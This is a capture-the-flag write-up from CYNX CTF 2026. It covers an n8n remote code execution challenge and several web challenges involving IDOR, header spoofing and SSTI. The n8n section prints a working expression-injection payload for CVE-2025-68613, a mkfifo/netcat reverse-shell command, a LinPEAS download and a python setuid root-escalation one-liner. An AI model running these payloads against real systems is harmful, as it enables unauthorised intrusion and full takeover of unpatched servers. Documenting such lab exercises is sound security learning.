CYNX CTF 2026
We joined CYNX CTF 2026 and solved challenges from both Boot2Root and Web categories. This writeup includes exploiting react2shell and a vulnerable n8n instance, both leading to remote code execution and full system compromise.
B2R - r007
PLUS ULTRA!!! [Boot2Root]
We are given an instance that had n8n runnning.
n8n is an open-source, visual workflow automation tool that lets users connect different apps and services to automate repetitive tasks, data movement, and complex processes without extensive coding. It uses a node-based system on a drag-and-drop canvas, allowing technical and non-technical users to build intricate integrations, from simple data syncs to advanced AI-powered workflows, with options for self-hosting or using their cloud service
Once, authenticated. We’re being greet with n8n critical 1.119.0 Version which could lead to known RCE.
Here’s more about CVE-2025-68613. So let’s proceed in exploiting. First, we need to create a new workflow. However in our case, we already given Project Plus Ultra.
Click the workflow, open node panel and add Edit Fields (Set) nodes.
The input form of the value is where we would inject our payload.
1
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}
We verified the exploit is working. I then do a reverse shell connection that ive generate from revshells.com. Don’t forget to setup our listener to be publicly accessible. Here’s our listener:
1
penelope.py -p 4444
Used ngrok to make it publicly accessible
1
ngrok tcp 4444
Make sure to use ngrok ip and port
1
{{ (function(){ return this.process.mainModule.require('child_process').execSync('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc IP PORT >/tmp/f').toString() })() }}
Shell as node
Once i received a shell, straight away i look for any utilities could be use to download LinPEAS.sh from github to PE (i don’t have anytime at that time to do manual enumeration, cause i try this challenge around last 20 min)
1
wget https://raw.githubusercontent.com/Mortemax/linux-privilege-escalation-awsome-script/refs/heads/master/linpeas.sh
As for the linpeas result:
We identified there’s python capabilties which can change uid. In this case, Python can use its cap_setuid ability to change its user ID to root, which means it can run commands as the root user. And we can spawn our own bash shell as root. For further explaination, can read here
Shell as root
Exploit:
1
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
Once we’ve gotten root priv, we can get the flag
1
CYNX{Plus_Ultr4_Sm4sh_Th3_K3rn3l}
Web - Z3r0Day
Zer0D4Y’s Little “Surprise”
Upon visiting the instance, we will presented with login page.
At first, i was really hooked in thinking it was some kind of jwt token or sqli after i decided to visit robots.txt.
Again, ive tried the keys as jwt secret and password but nothing much from those. So i tried to enumerate by using gobuster and find the flag.txt. Trust me, im asking myself as well…
The cc trolled me really really hard with this challenge…
1
CYNX{aWw_m4n_th0se_w3r3_mY_c00ki3s}
Zer0D4Y’s “Internal Affairs”
Visit the instance, it gave us the same login page. However, this time we had given “mary:Mary-123” as the creds.
Inside the /profile we can find there’s possible IDOR for user_id parameter.
First flag part: CYNX{bRuh_
From the IDOR, we able to uncover another part of the flag from users 1002, 1003, 1004
Second flag part: wh0
Third flag part: _d3s1gn3d
Fourth flag part: _th1s
(the “-“ is typo)
Also, we’ve been hint that Z3r0D4y has gotten access to internal access. One of the ways should be by tampering the req header such as: X-Forwarded-For: 127.0.0.1
And its working!
We also identified there’s an input form that vulnerable to SSTI
User input was rendered directly inside a template engine. Because of this, template expressions were executed on the server. This allowed reading system files and server data.
SSTI is exploitable. So we can find payload that will help us with RCE.
After gaining RCE, we able to find last part of the flag.
Last flag part: _sh1ttttttttttte}
1
CYNX{bRuh_wh0_d3s1gn3d_th1s_sh1ttttttttttte}